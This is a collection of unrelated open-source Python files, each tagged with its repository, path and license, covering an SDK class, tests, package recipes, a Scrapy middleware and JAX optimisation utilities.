vocab_dict, vocab_codes = _compile_vocab(data)
if "error" not in vocab_dict:
cache.set('vocab_dict', vocab_dict, timeout=CACHE_TIMEOUT)
cache.set('vocab_codes', codes, timeout=CACHE_TIMEOUT)
print "[+] Vocabulary cache reset"
else:
print "[-] Error in cache update"
except Exception as err:
message = 'compile_vocabulary exception: %s' % err.message
current_app.logger.warning(message)
|
oceanzus/ooi-ui-services
|
ooiservices/app/tasks.py
|
Python
|
apache-2.0
| 11,401
|
from a10sdk.common.A10BaseClass import A10BaseClass
class Radius(A10BaseClass):
"""Class Description::
RADIUS type.
Class radius supports CRUD Operations and inherits from `common/A10BaseClass`.
This class is the `"PARENT"` class for this module.`
:param radius_username: {"description": "Specify the username", "format": "string-rlx", "minLength": 1, "optional": true, "maxLength": 31, "type": "string"}
:param radius_password_string: {"description": "Configure password, '' means empty passworddd", "format": "password", "minLength": 1, "optional": true, "maxLength": 31, "type": "string"}
:param radius_encrypted: {"optional": true, "type": "encrypted", "description": "Do NOT use this option manually. (This is an A10 reserved keyword.) (The ENCRYPTED password string)", "format": "encrypted"}
:param radius_response_code: {"description": "Specify response code range (e.g. 2,4-7) (Format is xx,xx-xx (xx between [1, 13]))", "format": "string-rlx", "minLength": 1, "optional": true, "maxLength": 31, "type": "string"}
:param radius_expect: {"default": 0, "optional": true, "type": "number", "description": "Specify what you expect from the response message", "format": "flag"}
:param radius: {"default": 0, "optional": true, "type": "number", "description": "RADIUS type", "format": "flag"}
:param radius_secret: {"description": "Specify the shared secret of RADIUS server (Shared Crypto Key)", "format": "string-rlx", "minLength": 1, "optional": true, "maxLength": 31, "type": "string"}
:param radius_password: {"default": 0, "optional": true, "type": "number", "description": "Specify the user password", "format": "flag"}
:param radius_port: {"description": "Specify the RADIUS port, default is 1812 (Port number (default 1812))", "format": "number", "default": 1812, "optional": true, "maximum": 65534, "minimum": 1, "type": "number"}
:param uuid: {"description": "uuid of the object", "format": "string", "minLength": 1, "modify-not-allowed": 1, "optional": true, "maxLength": 64, "type": "string"}
:param DeviceProxy: The device proxy for REST operations and session handling. Refer to `common/device_proxy.py`
URL for this object::
`https://<Hostname|Ip address>//axapi/v3/health/monitor/{name}/method/radius`.
"""
def __init__(self, **kwargs):
self.ERROR_MSG = ""
self.required=[]
self.b_key = "radius"
self.a10_url="/axapi/v3/health/monitor/{name}/method/radius"
self.DeviceProxy = ""
self.radius_username = ""
self.radius_password_string = ""
self.radius_encrypted = ""
self.radius_response_code = ""
self.radius_expect = ""
self.radius = ""
self.radius_secret = ""
self.radius_password = ""
self.radius_port = ""
self.uuid = ""
for keys, value in kwargs.items():
setattr(self,keys, value)
|
amwelch/a10sdk-python
|
a10sdk/core/health/health_monitor_method_radius.py
|
Python
|
apache-2.0
| 2,951
|
username = 'admin'
pwd = '123321...'
dbname = 'Prueba'
host = '127.0.0.1'
port = '8069'
filepath = '/home/aphu/Downloads/'
filename = 'cantvnet.ods'
|
ITPS/oerp_gap_analysis_ITPS
|
utils/odf2gap/settings.py
|
Python
|
gpl-3.0
| 149
|
import numpy as np
import pandas as pd
import pandas.util.testing as tm
import dask.dataframe as dd
from dask.dataframe.utils import (shard_df_on_index, meta_nonempty, make_meta,
raise_on_meta_error)
import pytest
def test_shard_df_on_index():
df = pd.DataFrame({'x': [1, 2, 3, 4, 5, 6], 'y': list('abdabd')},
index=[10, 20, 30, 40, 50, 60])
result = list(shard_df_on_index(df, [20, 50]))
assert list(result[0].index) == [10]
assert list(result[1].index) == [20, 30, 40]
assert list(result[2].index) == [50, 60]
def test_make_meta():
df = pd.DataFrame({'a': [1, 2, 3], 'b': list('abc'), 'c': [1., 2., 3.]},
index=[10, 20, 30])
# Pandas dataframe
meta = make_meta(df)
assert len(meta) == 0
assert (meta.dtypes == df.dtypes).all()
assert isinstance(meta.index, type(df.index))
# Pandas series
meta = make_meta(df.a)
assert len(meta) == 0
assert meta.dtype == df.a.dtype
assert isinstance(meta.index, type(df.index))
# Pandas index
meta = make_meta(df.index)
assert isinstance(meta, type(df.index))
assert len(meta) == 0
# Dask object
ddf = dd.from_pandas(df, npartitions=2)
assert make_meta(ddf) is ddf._meta
# Dict
meta = make_meta({'a': 'i8', 'b': 'O', 'c': 'f8'})
assert isinstance(meta, pd.DataFrame)
assert len(meta) == 0
assert (meta.dtypes == df.dtypes).all()
assert isinstance(meta.index, pd.RangeIndex)
# Iterable
meta = make_meta([('a', 'i8'), ('c', 'f8'), ('b', 'O')])
assert (meta.columns == ['a', 'c', 'b']).all()
assert len(meta) == 0
assert (meta.dtypes == df.dtypes[meta.dtypes.index]).all()
assert isinstance(meta.index, pd.RangeIndex)
# Tuple
meta = make_meta(('a', 'i8'))
assert isinstance(meta, pd.Series)
assert len(meta) == 0
assert meta.dtype == 'i8'
assert meta.name == 'a'
# With index
meta = make_meta({'a': 'i8', 'b': 'i4'}, pd.Int64Index([1, 2], name='foo'))
assert isinstance(meta.index, pd.Int64Index)
assert len(meta.index) == 0
meta = make_meta(('a', 'i8'), pd.Int64Index([1, 2], name='foo'))
assert isinstance(meta.index, pd.Int64Index)
assert len(meta.index) == 0
# Numpy scalar
meta = make_meta(np.float64(1.0))
assert isinstance(meta, np.float64)
# Python scalar
meta = make_meta(1.0)
assert isinstance(meta, np.float64)
# Timestamp
x = pd.Timestamp(2000, 1, 1)
meta = make_meta(x)
assert meta is x
# Dtype expressions
meta = make_meta('i8')
assert isinstance(meta, np.int64)
meta = make_meta(float)
assert isinstance(meta, np.dtype(float).type)
meta = make_meta(np.dtype('bool'))
assert isinstance(meta, np.bool_)
assert pytest.raises(TypeError, lambda: make_meta(None))
def test_meta_nonempty():
df1 = pd.DataFrame({'A': pd.Categorical(['Alice', 'Bob', 'Carol']),
'B': list('abc'),
'C': 'bar',
'D': np.float32(1),
'E': np.int32(1),
'F': pd.Timestamp('2016-01-01'),
'G': pd.date_range('2016-01-01', periods=3,
tz='America/New_York'),
'H': pd.Timedelta('1 hours', 'ms'),
'I': np.void(b' ')},
columns=list('DCBAHGFEI'))
df2 = df1.iloc[0:0]
df3 = meta_nonempty(df2)
assert (df3.dtypes == df2.dtypes).all()
assert df3['A'][0] == 'Alice'
assert df3['B'][0] == 'foo'
assert df3['C'][0] == 'foo'
assert df3['D'][0] == np.float32(1)
assert df3['D'][0].dtype == 'f4'
assert df3['E'][0] == np.int32(1)
assert df3['E'][0].dtype == 'i4'
assert df3['F'][0] == pd.Timestamp('1970-01-01 00:00:00')
assert df3['G'][0] == pd.Timestamp('1970-01-01 00:00:00',
tz='America/New_York')
assert df3['H'][0] == pd.Timedelta('1', 'ms')
assert df3['I'][0] == 'foo'
s = meta_nonempty(df2['A'])
assert s.dtype == df2['A'].dtype
assert (df3['A'] == s).all()
def test_meta_duplicated():
df = pd.DataFrame(columns=['A', 'A', 'B'])
res = meta_nonempty(df)
exp = pd.DataFrame([['foo', 'foo', 'foo'],
['foo', 'foo', 'foo']],
index=['a', 'b'],
columns=['A', 'A', 'B'])
tm.assert_frame_equal(res, exp)
def test_meta_nonempty_index():
idx = pd.RangeIndex(1, name='foo')
res = meta_nonempty(idx)
assert type(res) is pd.RangeIndex
assert res.name == idx.name
idx = pd.Int64Index([1], name='foo')
res = meta_nonempty(idx)
assert type(res) is pd.Int64Index
assert res.name == idx.name
idx = pd.Index(['a'], name='foo')
res = meta_nonempty(idx)
assert type(res) is pd.Index
assert res.name == idx.name
idx = pd.DatetimeIndex(['1970-01-01'], freq='d',
tz='America/New_York', name='foo')
res = meta_nonempty(idx)
assert type(res) is pd.DatetimeIndex
assert res.tz == idx.tz
assert res.freq == idx.freq
assert res.name == idx.name
idx = pd.PeriodIndex(['1970-01-01'], freq='d', name='foo')
res = meta_nonempty(idx)
assert type(res) is pd.PeriodIndex
assert res.freq == idx.freq
assert res.name == idx.name
idx = pd.TimedeltaIndex([np.timedelta64(1, 'D')], freq='d', name='foo')
res = meta_nonempty(idx)
assert type(res) is pd.TimedeltaIndex
assert res.freq == idx.freq
assert res.name == idx.name
idx = pd.CategoricalIndex(['a'], ['a', 'b'], ordered=True, name='foo')
res = meta_nonempty(idx)
assert type(res) is pd.CategoricalIndex
assert (res.categories == idx.categories).all()
assert res.ordered == idx.ordered
assert res.name == idx.name
levels = [pd.Int64Index([1], name='a'),
pd.Float64Index([1.0], name='b')]
idx = pd.MultiIndex(levels=levels, labels=[[0], [0]], names=['a', 'b'])
res = meta_nonempty(idx)
assert type(res) is pd.MultiIndex
for idx1, idx2 in zip(idx.levels, res.levels):
assert type(idx1) is type(idx2)
assert idx1.name == idx2.name
assert res.names == idx.names
def test_meta_nonempty_scalar():
meta = meta_nonempty(np.float64(1.0))
assert isinstance(meta, np.float64)
x = pd.Timestamp(2000, 1, 1)
meta = meta_nonempty(x)
assert meta is x
def test_raise_on_meta_error():
try:
with raise_on_meta_error():
raise RuntimeError("Bad stuff")
except Exception as e:
assert e.args[0].startswith("Metadata inference failed.\n")
assert 'RuntimeError' in e.args[0]
try:
with raise_on_meta_error("myfunc"):
raise RuntimeError("Bad stuff")
except Exception as e:
assert e.args[0].startswith("Metadata inference failed in `myfunc`.\n")
assert 'RuntimeError' in e.args[0]
|
jeffery-do/Vizdoombot
|
doom/lib/python3.5/site-packages/dask/dataframe/tests/test_utils_dataframe.py
|
Python
|
mit
| 7,032
|
##############################################################################
# Copyright (c) 2013-2018, Lawrence Livermore National Security, LLC.
# Produced at the Lawrence Livermore National Laboratory.
#
# This file is part of Spack.
# Created by Todd Gamblin, tgamblin@llnl.gov, All rights reserved.
# LLNL-CODE-647188
#
# For details, see https://github.com/spack/spack
# Please also see the NOTICE and LICENSE files for our notice and the LGPL.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License (as
# published by the Free Software Foundation) version 2.1, February 1999.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the IMPLIED WARRANTY OF
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the terms and
# conditions of the GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
##############################################################################
from spack import *
class IsaacServer(CMakePackage):
"""In Situ Animation of Accelerated Computations: Server"""
homepage = "http://computationalradiationphysics.github.io/isaac/"
url = "https://github.com/ComputationalRadiationPhysics/isaac/archive/v1.3.0.tar.gz"
maintainers = ['ax3l']
version('develop', branch='dev',
git='https://github.com/ComputationalRadiationPhysics/isaac.git')
version('master', branch='master',
git='https://github.com/ComputationalRadiationPhysics/isaac.git')
version('1.3.3', '7aeebaf0c5a77e2cb9bea066750e369b')
version('1.3.2', 'c557daa74de52fd79e734c9758fca38b')
version('1.3.1', '7fe075f9af68d05355eaba0e224f20ca')
version('1.3.0', 'c8a794da9bb998ef0e75449bfece1a12')
# variant('gstreamer', default=False, description= \
# 'Support for RTP streams, e.g. to Twitch or Youtube')
depends_on('cmake@3.3:', type='build')
depends_on('jpeg', type='link')
depends_on('jansson', type='link')
depends_on('boost@1.56.0:', type='link')
depends_on('libwebsockets@2.1.1:', type='link')
# depends_on('gstreamer@1.0', when='+gstreamer')
# Until the pull request is merged: https://github.com/ComputationalRadiationPhysics/isaac/pull/70
patch('jpeg.patch', when='@:1.3.1')
root_cmakelists_dir = 'server'
|
tmerrick1/spack
|
var/spack/repos/builtin/packages/isaac-server/package.py
|
Python
|
lgpl-2.1
| 2,583
|
# -*- coding: utf-8 -*-
###############################################################################
#
# GetViewCount
# Returns the ticket count for a single view.
#
# Python versions 2.6, 2.7, 3.x
#
# Copyright 2014, Temboo Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND,
# either express or implied. See the License for the specific
# language governing permissions and limitations under the License.
#
#
###############################################################################
from temboo.core.choreography import Choreography
from temboo.core.choreography import InputSet
from temboo.core.choreography import ResultSet
from temboo.core.choreography import ChoreographyExecution
import json
class GetViewCount(Choreography):
def __init__(self, temboo_session):
"""
Create a new instance of the GetViewCount Choreo. A TembooSession object, containing a valid
set of Temboo credentials, must be supplied.
"""
super(GetViewCount, self).__init__(temboo_session, '/Library/Zendesk/Views/GetViewCount')
def new_input_set(self):
return GetViewCountInputSet()
def _make_result_set(self, result, path):
return GetViewCountResultSet(result, path)
def _make_execution(self, session, exec_id, path):
return GetViewCountChoreographyExecution(session, exec_id, path)
class GetViewCountInputSet(InputSet):
"""
An InputSet with methods appropriate for specifying the inputs to the GetViewCount
Choreo. The InputSet object is used to specify input parameters when executing this Choreo.
"""
def set_Email(self, value):
"""
Set the value of the Email input for this Choreo. ((required, string) The email address you use to login to your Zendesk account.)
"""
super(GetViewCountInputSet, self)._set_input('Email', value)
def set_ID(self, value):
"""
Set the value of the ID input for this Choreo. ((conditional, string) Retrieve a view count for the ID of the specified view.)
"""
super(GetViewCountInputSet, self)._set_input('ID', value)
def set_Password(self, value):
"""
Set the value of the Password input for this Choreo. ((required, password) Your Zendesk password.)
"""
super(GetViewCountInputSet, self)._set_input('Password', value)
def set_Server(self, value):
"""
Set the value of the Server input for this Choreo. ((required, string) Your Zendesk domain and subdomain (e.g., temboocare.zendesk.com).)
"""
super(GetViewCountInputSet, self)._set_input('Server', value)
class GetViewCountResultSet(ResultSet):
"""
A ResultSet with methods tailored to the values returned by the GetViewCount Choreo.
The ResultSet object is used to retrieve the results of a Choreo execution.
"""
def getJSONFromString(self, str):
return json.loads(str)
def get_Response(self):
"""
Retrieve the value for the "Response" output from this Choreo execution. ((json) The response from Zendesk.)
"""
return self._output.get('Response', None)
class GetViewCountChoreographyExecution(ChoreographyExecution):
def _make_result_set(self, response, path):
return GetViewCountResultSet(response, path)
|
jordanemedlock/psychtruths
|
temboo/core/Library/Zendesk/Views/GetViewCount.py
|
Python
|
apache-2.0
| 3,674
|
"""Set User-Agent header per spider or use a default value from settings"""
from scrapy import signals
class UserAgentMiddleware(object):
"""This middleware allows spiders to override the user_agent"""
def __init__(self, user_agent='Scrapy'):
self.user_agent = user_agent
@classmethod
def from_crawler(cls, crawler):
o = cls(crawler.settings['USER_AGENT'])
crawler.signals.connect(o.spider_opened, signal=signals.spider_opened)
return o
def spider_opened(self, spider):
self.user_agent = getattr(spider, 'user_agent', self.user_agent)
def process_request(self, request, spider):
if self.user_agent:
request.headers.setdefault(b'User-Agent', self.user_agent)
|
agreen/scrapy
|
scrapy/downloadermiddlewares/useragent.py
|
Python
|
bsd-3-clause
| 749
|
import pkgutil
class NoQuestionInModuleException(Exception): pass
# Define a dict to add all of our finds to.
categories = {}
def load(path):
# Path needs to be a list in order for the following calls to work.
if type(path) != list: path = [path]
# Walk the directory.
for loader, name, ispkg in pkgutil.walk_packages(path):
module = loader.find_module(name).load_module(name)
# Try to find the module's defined class, and add it to the
# list.
qname = name + "Question"
try:
if qname in dir(module):
categories[qname.lower()] = module.__dict__[qname]
else:
raise NoQuestionInModuleException("No class %s" % qname)
except Exception as e:
print("Skipping module {}: {}".format(name, e))
# Load all of the questions in this path.
load(__path__)
|
alexander-bauer/swirlypy
|
swirlypy/questions/__init__.py
|
Python
|
gpl-3.0
| 881
|
# Copyright 2020 DeepMind Technologies Limited.
#
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Utilities related to multi-device operations."""
import collections
from typing import Any, Mapping, Optional, Sequence, Tuple, TypeVar, Union
import dataclasses
import jax
from jax import core
from jax import lax
import jax.numpy as jnp
from jax.scipy import linalg
import jax.tree_util as tree_util
T = TypeVar("T")
def wrap_if_pmap(p_func):
def p_func_if_pmap(obj, axis_name):
try:
core.axis_frame(axis_name)
return p_func(obj, axis_name)
except NameError:
return obj
return p_func_if_pmap
pmean_if_pmap = wrap_if_pmap(lax.pmean)
psum_if_pmap = wrap_if_pmap(lax.psum)
compute_mean = jax.pmap(lambda x: lax.pmean(x, "i"), axis_name="i")
compute_sum = jax.pmap(lambda x: lax.psum(x, "i"), axis_name="i")
def get_first(obj: T) -> T:
return jax.tree_map(lambda x: x[0], obj)
def get_mean(obj: T) -> T:
return get_first(compute_mean(obj))
def get_sum(obj: T) -> T:
return get_first(compute_sum(obj))
broadcast_all_local_devices = jax.pmap(lambda x: x)
def replicate_all_local_devices(obj: T) -> T:
n = jax.local_device_count()
obj_stacked = jax.tree_map(lambda x: jnp.stack([x] * n, axis=0), obj)
return broadcast_all_local_devices(obj_stacked)
def make_different_rng_key_on_all_devices(rng: jnp.ndarray) -> jnp.ndarray:
rng = jax.random.fold_in(rng, jax.host_id())
rng = jax.random.split(rng, jax.local_device_count())
return broadcast_all_local_devices(rng)
p_split = jax.pmap(lambda key: tuple(jax.random.split(key)))
def scalar_mul(obj: T, scalar: Union[float, jnp.ndarray]) -> T:
return jax.tree_map(lambda x: x * scalar, obj)
def scalar_div(obj: T, scalar: Union[float, jnp.ndarray]) -> T:
return jax.tree_map(lambda x: x / scalar, obj)
def make_func_args(params, func_state, rng, batch, has_state: bool,
has_rng: bool):
"""Correctly puts all arguments to the function together."""
func_args = (params,)
if has_state:
if func_state is None:
raise ValueError("The `func_state` is None, but the argument `has_state` "
"is True.")
func_args += (func_state,)
if has_rng:
if rng is None:
raise ValueError("The `rng` is None, but the argument `has_rng` is True.")
func_args += (rng,)
func_args += (batch,)
return func_args
def extract_func_outputs(
raw_outputs: Any,
has_aux: bool,
has_state: bool,
) -> Tuple[jnp.ndarray, Any, Any]:
"""Given the function output returns separately the loss, func_state, aux."""
if not has_aux and not has_state:
return raw_outputs, None, None
loss, other = raw_outputs
if has_aux and has_state:
func_state, aux = other
elif has_aux:
func_state, aux = None, other
else:
func_state, aux = other, None
return loss, func_state, aux
def inner_product(obj1: T, obj2: T) -> jnp.ndarray:
if jax.tree_structure(obj1) != jax.tree_structure(obj2):
raise ValueError("The two structures are not identical.")
elements_product = jax.tree_multimap(lambda x, y: jnp.sum(x * y), obj1, obj2)
return sum(jax.tree_flatten(elements_product)[0])
def psd_inv_cholesky(matrix: jnp.ndarray, damping: jnp.ndarray) -> jnp.ndarray:
assert matrix.ndim == 2
identity = jnp.eye(matrix.shape[0])
matrix = matrix + damping * identity
return linalg.solve(matrix, identity, sym_pos=True)
def solve_maybe_small(a: jnp.ndarray, b: jnp.ndarray) -> jnp.ndarray:
"""Computes a^-1 b more efficiently for small matrices."""
assert a.shape[-1] == a.shape[-2] == b.shape[-1]
d = a.shape[-1]
if d == 0:
return a
elif d == 1:
return b / a[..., 0]
elif d == 2:
det = a[..., 0, 0] * a[..., 1, 1] - a[..., 0, 1] * a[..., 1, 0]
b_0 = a[..., 1, 1] * b[..., 0] - a[..., 0, 1] * b[..., 1]
b_1 = a[..., 0, 0] * b[..., 1] - a[..., 1, 0] * b[..., 0]
return jnp.stack([b_0, b_1], axis=-1) / det
elif d == 3:
raise NotImplementedError()
return jnp.linalg.solve(a, b)
def pi_adjusted_inverse(
factor_0: jnp.ndarray,
factor_1: jnp.ndarray,
damping: jnp.ndarray,
pmap_axis_name: str,
) -> Tuple[jnp.ndarray, jnp.ndarray]:
"""Performs inversion with pi-adjusted damping."""
# Compute the norms of each factor
norm_0 = jnp.trace(factor_0)
norm_1 = jnp.trace(factor_1)
# We need to sync the norms here, because reduction can be non-deterministic.
# They specifically are on GPUs by default for better performance.
# Hence although factor_0 and factor_1 are synced, the trace operation above
# can still produce different answers on different devices.
norm_0, norm_1 = pmean_if_pmap((norm_0, norm_1), axis_name=pmap_axis_name)
# Compute the overall scale
scale = norm_0 * norm_1
def regular_inverse(
operand: Sequence[jnp.ndarray]) -> Tuple[jnp.ndarray, jnp.ndarray]:
factor0, factor1, norm0, norm1, s, d = operand
# Special cases with one or two scalar factors
if factor0.size == 1 and factor1.size == 1:
value = jnp.ones_like(factor0) / jnp.sqrt(s)
return value, value
if factor0.size == 1:
factor1_normed = factor1 / norm1
damping1 = d / norm1
factor1_inv = psd_inv_cholesky(factor1_normed, damping1)
return jnp.full((1, 1), s), factor1_inv
if factor1.size == 1:
factor0_normed = factor0 / norm0
damping0 = d / norm0
factor0_inv = psd_inv_cholesky(factor0_normed, damping0)
return factor0_inv, jnp.full((1, 1), s)
# Invert first factor
factor0_normed = factor0 / norm0
damping0 = jnp.sqrt(d * factor1.shape[0] / (s * factor0.shape[0]))
factor0_inv = psd_inv_cholesky(factor0_normed, damping0) / jnp.sqrt(s)
# Invert second factor
factor1_normed = factor1 / norm1
damping1 = jnp.sqrt(d * factor0.shape[0] / (s * factor1.shape[0]))
factor1_inv = psd_inv_cholesky(factor1_normed, damping1) / jnp.sqrt(s)
return factor0_inv, factor1_inv
def zero_inverse(
operand: Sequence[jnp.ndarray]) -> Tuple[jnp.ndarray, jnp.ndarray]:
return (jnp.eye(factor_0.shape[0]) / jnp.sqrt(operand[-1]),
jnp.eye(factor_1.shape[0]) / jnp.sqrt(operand[-1]))
# In the special case where for some reason one of the factors is zero, then
# the correct inverse of `(0 kron A + lambda I)` is
# `(I/sqrt(lambda) kron (I/sqrt(lambda)`. However, because one of the norms is
# zero, then `pi` and `1/pi` would be 0 and infinity leading to NaN values.
# Hence, we need to make this check explicitly.
return lax.cond(
jnp.greater(scale, 0.0),
regular_inverse,
zero_inverse,
operand=(factor_0, factor_1, norm_0, norm_1, scale, damping))
def convert_value_and_grad_to_value_func(
value_and_grad_func,
has_aux: bool = False,
):
"""Converts a value_and_grad function to value_func only."""
def value_func(*args, **kwargs):
out, _ = value_and_grad_func(*args, **kwargs)
if has_aux:
return out[0]
else:
return out
return value_func
def check_structure_shapes_and_dtype(obj1: T, obj2: T) -> None:
"""Verifies that the two objects have the same pytree structure."""
assert jax.tree_structure(obj1) == jax.tree_structure(obj2)
for v1, v2 in zip(jax.tree_flatten(obj1)[0], jax.tree_flatten(obj2)[0]):
assert v1.shape == v2.shape
assert v1.dtype == v2.dtype
def check_first_dim_is_batch_size(batch_size: int, *args: jnp.ndarray) -> None:
for i, arg in enumerate(args):
if arg.shape[0] != batch_size:
raise ValueError(f"Expecting first dimension of arg[{i}] with shape "
f"{arg.shape} to be equal to the batch size "
f"{batch_size}.")
def py_tree_registered_dataclass(cls, *args, **kwargs):
"""Creates a new dataclass type and registers it as a pytree node."""
dcls = dataclasses.dataclass(cls, *args, **kwargs)
tree_util.register_pytree_node(
dcls,
lambda instance: ( # pylint: disable=g-long-lambda
[getattr(instance, f.name)
for f in dataclasses.fields(instance)], None),
lambda _, instance_args: dcls(*instance_args))
return dcls
class WeightedMovingAverage:
"""A wrapped class for a variable for which we keep exponential moving average."""
def __init__(self, weight: jnp.ndarray, array: jnp.ndarray):
self._weight = weight
self._array = array
@staticmethod
def zero(shape: Sequence[int]) -> "WeightedMovingAverage":
return WeightedMovingAverage(weight=jnp.zeros([]), array=jnp.zeros(shape))
@property
def weight(self) -> jnp.ndarray:
return self._weight
@property
def value(self) -> jnp.ndarray:
return self._array / self._weight
@property
def raw_value(self) -> jnp.ndarray:
return self._array
def update(self, value: jnp.ndarray, old_weight_multiplier: float,
new_weight: float) -> None:
self._weight = old_weight_multiplier * self._weight + new_weight
self._array = old_weight_multiplier * self._array + new_weight * value
def sync(self, pmap_axis_name: str) -> None:
self._array = pmean_if_pmap(self._array, pmap_axis_name)
def __str__(self) -> str:
return (f"ExponentialMovingAverage(weight={self._weight}, "
f"array={self._array})")
def __repr__(self) -> str:
return self.__str__()
tree_util.register_pytree_node(
WeightedMovingAverage,
lambda instance: ((instance.weight, instance.raw_value), None),
lambda _, instance_args: WeightedMovingAverage(*instance_args),
)
class Stateful:
"""A class for stateful objects."""
def __init__(self, stateful_fields_names: Optional[Sequence[str]] = ()):
self.__stateful_fields_names = stateful_fields_names
def _add_stateful_fields_names(self, value: Sequence[str]) -> None:
self.__stateful_fields_names += tuple(value)
def get_state(self) -> Mapping[str, Any]:
"""Returns the state of the object."""
state = dict()
for name in self.__stateful_fields_names:
state[name] = Stateful._get_state_from_instance(getattr(self, name))
return state
def set_state(self, value):
"""Sets the state of the object with the provided value and returns the object."""
assert isinstance(value, dict)
for name in self.__stateful_fields_names:
setattr(self, name,
Stateful._set_state_to_instance(getattr(self, name), value[name]))
return self
def clear_state(self) -> None:
"""Clears the state of the object."""
for name in self.__stateful_fields_names:
setattr(self, name,
Stateful._clear_state_from_instance(getattr(self, name)))
def pop_state(self) -> Mapping[str, Any]:
"""Returns the current state of the object, while simultaneously clearing it."""
state = self.get_state()
self.clear_state()
return state
@staticmethod
def _get_state_from_instance(obj):
"""Recursively gets the state of the object and returns it."""
if isinstance(obj, Stateful):
return obj.get_state()
if isinstance(obj, list):
return [Stateful._get_state_from_instance(i) for i in obj]
if isinstance(obj, tuple):
return tuple(Stateful._get_state_from_instance(i) for i in obj)
if isinstance(obj, collections.OrderedDict):
return collections.OrderedDict(
(k, Stateful._get_state_from_instance(v)) for k, v in obj.items())
if isinstance(obj, dict):
return dict(
(k, Stateful._get_state_from_instance(v)) for k, v in obj.items())
return obj
@staticmethod
def _set_state_to_instance(obj, value):
"""Recursively sets the state of the object and returns it."""
if isinstance(obj, Stateful):
obj.set_state(value)
return obj
if isinstance(value, list):
if obj is None:
obj = [None] * len(value)
return [
Stateful._set_state_to_instance(obj_i, value_i)
for obj_i, value_i in zip(obj, value)
]
if isinstance(value, tuple):
if obj is None:
obj = [None] * len(value)
return tuple(
Stateful._set_state_to_instance(obj_i, value_i)
for obj_i, value_i in zip(obj, value))
if isinstance(value, collections.OrderedDict):
if obj is None:
obj = dict((k, None) for k in value)
return collections.OrderedDict(
(k, Stateful._set_state_to_instance(obj[k], value[k])) for k in obj)
if isinstance(value, dict):
obj = dict((k, None) for k in value)
return dict(
(k, Stateful._set_state_to_instance(obj[k], value[k])) for k in obj)
return value
@staticmethod
def _clear_state_from_instance(obj):
"""Recursively clears the state of the object and returns it."""
if isinstance(obj, Stateful):
obj.clear_state()
return obj
if isinstance(obj, list):
return [Stateful._clear_state_from_instance(obj_i) for obj_i in obj]
if isinstance(obj, tuple):
return tuple(Stateful._clear_state_from_instance(obj_i) for obj_i in obj)
if isinstance(obj, collections.OrderedDict):
return collections.OrderedDict(
(k, Stateful._clear_state_from_instance(obj[k])) for k in obj)
if isinstance(obj, dict):
return dict((k, Stateful._clear_state_from_instance(obj[k])) for k in obj)
return None
@staticmethod
def infer_class_state(class_type):
"""Infers a stateful class state attributes from class annotations."""
if not issubclass(class_type, Stateful):
raise ValueError(
f"In order to annotate a class as stateful it must inherit "
f"{Stateful!r}")
class_type = dataclasses.dataclass(
class_type, init=False, repr=False, eq=False) # pytype: disable=wrong-keyword-args
fields_names = tuple(field.name for field in dataclasses.fields(class_type))
original_init = getattr(class_type, "__init__", None)
if original_init is None:
def injected_init(self, *args, **kwargs):
super(self.__class__, self).__init__(*args, **kwargs) # pylint: disable=bad-super-call
Stateful._add_stateful_fields_names(self, fields_names)
for field_name in fields_names:
if getattr(self, field_name, None) is None:
setattr(self, field_name, None)
setattr(class_type, "__init__", injected_init)
else:
def injected_init(self, *args, **kwargs):
original_init(self, *args, **kwargs)
Stateful._add_stateful_fields_names(self, fields_names)
for field_name in fields_names:
if getattr(self, field_name, None) is None:
setattr(self, field_name, None)
setattr(class_type, "__init__", injected_init)
return class_type
def compute_sq_norm_relative_abs_diff(obj, pmap_axis_name):
sq_norm = inner_product(obj, obj)
synced_sq_norm = psum_if_pmap(sq_norm, pmap_axis_name)
synced_sq_norm = (synced_sq_norm - sq_norm) / (jax.device_count() - 1.0)
sq_norm_abs_diff = jnp.abs(sq_norm - synced_sq_norm)
return sq_norm_abs_diff / sq_norm
def product(iterable_object):
x = 1
for element in iterable_object:
x *= element
return x
|
deepmind/deepmind-research
|
kfac_ferminet_alpha/utils.py
|
Python
|
apache-2.0
| 15,537
|
'''
qobuz.node.helper
~~~~~~~~~~~~~~~~~
:part_of: kodi-qobuz
:copyright: (c) 2012-2018 by Joachim Basmaison, Cyril Leclerc
:license: GPLv3, see LICENSE for more details.
'''
from qobuz.debug import getLogger
from qobuz.node import getNode, Flag
logger = getLogger(__name__)
def make_local_track_url(config, track):
return '{scheme}://{host}:{port}/qobuz/{album_id}/{nid}.mpc'.format(
scheme='http',
host=config.app.registry.get('httpd_host'),
port=config.app.registry.get('httpd_port'),
album_id=track.get_album_id(),
nid=str(track.nid))
def make_local_album_url(config, album):
return '{scheme}://{host}:{port}/qobuz/{album_id}/'.format(
scheme='http',
host=config.app.registry.get('httpd_host'),
port=config.app.registry.get('httpd_port'),
album_id=album.nid)
class TreeTraverseOpts(object):
_properties = ['xdir', 'lvl', 'whiteFlag', 'blackFlag', 'noRemote', 'data']
def __init__(self, **ka):
self.xdir = None
self.lvl = None
self.whiteFlag = None
self.blackFlag = None
self.noRemote = False
self.data = None
self.parse_keyword_argument(**ka)
def parse_keyword_argument(self, **ka):
for key in ka:
if key not in self._properties:
raise KeyError(key)
setattr(self, key, ka.get(key))
def clone(self):
return TreeTraverseOpts(**{p: getattr(self, p)
for p in self._properties})
def get_tree_traverse_opts(options=None):
if options is None:
return TreeTraverseOpts()
return options.clone()
def get_node_album(album):
node = getNode(Flag.ALBUM, data=album)
cache = node.fetch(TreeTraverseOpts(noRemote=True))
